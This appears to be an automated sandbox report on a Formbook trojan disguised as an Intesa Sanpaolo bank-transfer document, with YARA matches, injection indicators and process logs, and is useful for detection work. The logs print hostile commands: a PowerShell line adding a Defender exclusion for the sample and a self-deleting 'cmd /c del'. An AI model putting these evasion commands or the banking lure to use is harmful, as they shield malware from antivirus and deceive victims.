          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047938E08_2_047938E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047999508_2_04799950
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047AB9508_2_047AB950
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0482DAAC8_2_0482DAAC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0483DAC68_2_0483DAC6
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04847A468_2_04847A46
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484FA498_2_0484FA49
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047D5AA08_2_047D5AA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04803A6C8_2_04803A6C
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04805BF08_2_04805BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047CDBF98_2_047CDBF9
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0484FB768_2_0484FB76
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047AFB808_2_047AFB80
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02539E608_2_02539E60
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02532FB08_2_02532FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02532D908_2_02532D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_02532D878_2_02532D87
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0254EDAD8_2_0254EDAD
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0453A0368_2_0453A036
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04532D028_2_04532D02
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0453E5CD8_2_0453E5CD
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_045310828_2_04531082
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_045389128_2_04538912
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0453B2328_2_0453B232
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04535B328_2_04535B32
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04535B308_2_04535B30
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 047C5130 appears 36 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0477B970 appears 272 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 047D7E54 appears 98 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 047FEA12 appears 86 times
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 0480F290 appears 105 times
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: String function: 0114F290 appears 105 times
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: String function: 010BB970 appears 275 times
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: String function: 01105130 appears 56 times
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: String function: 01117E54 appears 100 times
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: String function: 0113EA12 appears 86 times
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1366719336.0000000006C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000000.1295039681.0000000000300000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBIze.exe< vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1367761102.0000000007650000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1360830781.00000000026C1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421415028.00000000011BD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1423184745.0000000002CBD000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeBinary or memory string: OriginalFilenameBIze.exe< vs Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe PID: 7532, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe PID: 7828, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 7984, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, yVWN9ifYkhERJOAQN3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, yVWN9ifYkhERJOAQN3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.3a727b0.7.raw.unpack, tydX84t5EsHI9QvB2T.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.6c30000.9.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.2a647e4.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.2720108.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.2730120.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: classification engineClassification label: mal100.troj.evad.winEXE@13/7@10/8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_002238B0 HeapSetInformation,StrCmpICW,CompareStringOrdinal,CompareStringOrdinal,CoTaskMemFree,StrCmpICW,IsOS,CompareStringOrdinal,StrCmpICW,StrCmpICW,lstrlenW,AllowSetForegroundWindow,ShellExecuteExW,CoInitializeEx,CoCreateInstance,CoUninitialize,8_2_002238B0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw1qdhoc.n05.ps1Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeCommand line argument: F"8_2_00224630
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeReversingLabs: Detection: 78%
          Source: unknownProcess created: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: onecorecommonproxystub.dllJump to behavior
